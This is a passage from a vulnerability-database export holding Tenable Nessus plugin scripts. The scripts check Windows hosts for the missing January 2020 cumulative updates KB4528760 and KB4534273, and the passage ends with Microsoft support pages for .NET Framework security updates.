validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4528760/windows-10-update-kb4528760\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?027d37ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4528760.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4528760');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:47", "description": "The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0609", "CVE-2020-0638", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0616", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0612", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534273.NASL", "href": "https://www.tenable.com/plugins/nessus/132859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132859);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0612\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534273\");\n script_xref(name:\"MSFT\", value:\"MS20-4534273\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\");\n # https://support.microsoft.com/en-us/help/4534273/windows-10-update-kb4534273\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a22c8c16\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534273.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534273');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534273])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:35:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4532933 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532933\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532933.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:24", "id": "KB4532933", "href": "https://support.microsoft.com/en-us/help/4532933/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4532933 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Server 2008 R2 SP1 (KB4534976)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 